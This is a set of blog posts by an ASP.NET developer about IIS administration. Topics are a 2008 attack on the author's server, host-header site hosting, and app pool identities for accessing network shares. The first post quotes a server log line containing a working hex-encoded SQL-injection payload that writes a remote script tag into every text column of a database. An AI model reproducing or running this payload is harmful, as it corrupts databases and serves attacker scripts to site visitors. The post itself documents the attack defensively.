I was reading some posts on Twitter the past couple days and noticed some Tweets from Phil Haack and Scott Hanselman regarding an attack on their web   servers for their blogs which caused a large spike in traffic.  They determined it was some type of Distributed Denial of Service (DDOS) attack.  I decided to check out my own server which I host this site and to my surprise, the same thing had been happening to me all day with an increase in traffic 10x.

I reviewed my server logs and saw some really large QueryStrings being sent which looked like this:

2008-08-08 05:51:53 W3SVC2557 SV2419 74.86.230.234 GET /asp-net/feed/ ‘;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43757273
6F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756
D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7874
7970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220464554434
8204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920
424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C6
53E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D
272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646
F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655
F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 – 69.180.0.90 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;
+Zango+10.3.74.0) – – accidentaltechnologist.com 200 0 0 27171 1514 3328

It appears this is more of a SQL Injection attack and not just simply a DDOS.  You can see the EXEC(@S) where they are trying to execute some nasty SQL on my server.  Rick Strahl has also had some similar problems and he addresses the issue in IIS 7.0.

Not being what to do, I went to Twitter, pinged Scott to see what he did to stop the attack and he suggested URLScan from Microsoft.  Of course, this is tool I used to use back in the day of supporting clients web servers to help ward off unfriendly visitors.  I had forgotten all about this tool until Scott mentioned it.

I downloaded URLScan from Microsoft and promptly installed it on my web server and the DDOS attack stopped almost instantly.  The current version of URLScan is 2.5 which says it only works on IIS 6.0, but a beta version of URLScan 3.0 is available for IIS 5.1, 6.0, and 7.0.

Thank you Scott for the quick reply and suggestion to fix my problem.

I have been working with Microsoft Internet Information Server (IIS) since very early on and sometimes take for granted some nice features in the current (pre-IIS7) versions.

Much of my work is from the development side of things, creating ASP.NET web sites and web services.  I do get involved in the management of those IIS servers from time-to-time.   One issue that we often face is how to host multiple web sites on the same IIS server.  There are three approaches that work, they are:

1. Separate IP address for each site hosted – this works but requires you to use a precious IP address that your hosting company may not want to give out.

2. Use different TCP port – since normal HTTP traffic uses port 80 there is nothing saying you can host your web site on a different port, say 8080.  The drawback to this is yoursite.com:8080 may have it’s port blocked by the firewall you are behind and it’s not a common port so your users may have a hard time finding it.

3. The best way, in my opinion is to use what is called Host-Header Routing, which is part of the HTTP 1.1 specification.  Host-Header Routing is simply using a single IP address in your IIS configuration for all of your web sites but differ them in the configuration by indicating their host name.

You can access this information by going to Internet Information Services and right-clicking on your website and choose Properties and go to the Web Site tab and click the Advanced button and see a screen like below:

Choose the Edit button which will reveal a dialog like this:

Simply enter your host like “www.microsoft.com” into the Host Header Name field and select OK.  You can now do the same thing for additional web sites using the (All Unassigned) IP Address but vary the Host Header Name.   This will save your IP addresses and is an nice way to host multiple web sites.

The only caveat is the browser needs to support HTTP 1.1, which almost all do today.

I recently setup and configured some new web servers for the?new web application being rolled out.? The application is an ASP.NET 2.0 application running on IIS6 and Windows 2003. Our existing application this new application will replace runs in IIS5 and Windows 2000.? The real differentiator is the legacy application is running on a Windows?domain and our new application will not.? This decision was made to remove the domain, domain management and the overhead incurred by having a domain in our web application. The application runs two web servers in a cluster?using Microsoft Network Load Balancing.? Load Balancing does just what it says, balances the workload.? This is not all it does, it allows us to take down one server for maintenance while not taking the application down from our clients.? We have a third server that we call our Application Server that runs various “batch” applications for system maintenance.? This server?keeps all of our images for the web sites and since this is an eCommerce site we have thousands of product images.? Instead of keeping each image on each server and having to maintain images in more than on location we chose to have a central location and have IIS use a share on our Application Server. The Problem There is an inherent problem with this configuration.? By default, IIS?5 runs under the ASP.NET?worker process?and?the default App?Pool in IIS6 runs?under the NETWORK SERVICE user.???Since we don’t have a domain there is a problem, all of the NETWORK SERVICE accounts are local accounts in each system and have an auto generated password.? This causes a problem in our application when we try to upload images, create new directories or even check for the existence of a file?on?our web application. I configured IIS with a virtual directory on another server, which is pretty straight-forward.? We have a Windows share on the other server with permissions for the user we are using to “Connect As” from IIS.? See the below how we indicate a share on another server: ? We need to tell IIS what user we want to use to connect to this share: I am using a user called AppFilesUser, which has to be setup prior on all servers to be used for sharing files, in our case 3.? The user has to have the same password on all the servers as well.? Our web applications display images from the AppFiles share, which work well with this configuration.? The real problem comes into light when we perform certain administrative tasks from the web site that does a Directory.Exists, File.Exists or other Directory.* functions. I started searching the Internet for possible solutions to my problem?and was surprised there was very little posted about this situation.? Even the trusty ASP.NET Forums showed little promise.? Was I wrong in my assumption that this was a good way to go?? Well, maybe but I was not planning on taking the easy way out and simply setup a domain. The Solution Any time?you come up with a solution to a problem you have to first understand the entire problem completely.?? I had said our web site was displaying images fine but when trying to do some simple management we were getting errors in our logs and things were not working.? The key to understanding what was actually going on relies on how .NET handles certain method calls to the Directory and File classes in particular.? You see, when our web application simply requests an image, IIS just uses the virtual path we specified in our virtual directory to display the file.? This worked for us the first time.? The real problem is how IIS is handling the our calls to Directory.Exists() in our code.? I assumed (yes, I know) IIS was handling the call the same way, through a virtual path but this is NOT the case at all.? Looking at the Directory.Exists() and File.Exists()on MSDN it reveals the obvious problem, both methods use relative or absolute paths, not virtual.?? What this means is IIS is using the NETWORK SERVICE account to connect to the AppFiles share to do our business.? This way IIS is connecting is the real problem here and explains why viewing our images works but simple things like checking for the existence of a file does not.? Since we are not in a domain and the NETWORK SERVICE accounts are all have unique passwords making the ability of the Windows to use pass-through authentication ineffective.? The real solution here is to by-pass the NETWORK SERVICE user and create our own user.? It’s pretty simple once you know how to do it and secure as well.? Since Microsoft did away with the aspnet_wp.exe from IIS5 in IIS6 they decided to use a user who had very little privileges, NETWORK SERVICE.? Since NETWORK SERVICE has so little privileges our user won’t need any special permissions either.? The steps below are all that is needed to solve this problem:

1. Create new user on all servers– I called my user AdminWebUser and did this on all of our web servers in our cluster as well as the server actually doing the sharing.
2. Make the new user a member of the IIS_WPG group – this was a key piece of the puzzle.? The NETWORK SERVICE user is a member of this group with this group having the minimal but needed permissions.
3. Assign read/write permissions to the share and the directory of the images to the IIS_WPG group– this is done on the server actually housing the images.? Make sure the share and the directory have their permissions set.?? If IIS is not on this server then you can just assign the user you created in step 1 to the share and directory.? I also make sure the flags are set so any directories in the path below this directory inherit these permissions.
4. Create a new App Pool in IIS for this application– this is not required but since I have multiple applications on our servers I wanted to keep these changes isolated.? It is not a bad idea at all to have separate app pools for each application so there is isolation between apps in order to so maintenance, etc.? I won’t explain how to create an app pool here, it’s pretty self-explanatory or you can search on Microsoft’s web site for explicit directions.
5. Change the identity used by the app pool to the new user created in step 1
6. Change the app pool used by the web application to the one created in step 4 – this is important and must be done.?

And that’s it!? It took some time to figure all of this out, yes a bunch of trial and error.? I hope I can save you some time and hair pulling. UPDATE: After several days of running with this configuration I ran into a slight problem.? I am accessing a web service from this web site and the instantation of the local web service proxy class kept failing with the following error in our application (not Windows Application Event log): Unable to generate a temporary class (result=1). error CS2001: Source file ‘C:\WINDOWS\TEMP\z3wfukwd.0.cs’ could not be found error CS2008: No inputs specified It turns out when changing the user our App Pool was running under there happens to be some services that use the temp directory.? If you look on your Windows 2003 system you will see that NETWORK SERVICE has special rights to this directory instead of the IIS_WPG group, which I found strange.? Once I added IIS_WPG to the permissions list for the temp directory and matched those of NETWORK SERVICE, the calls to the web service worked again. Tec
hnorati Tags : ASP.NET, IIS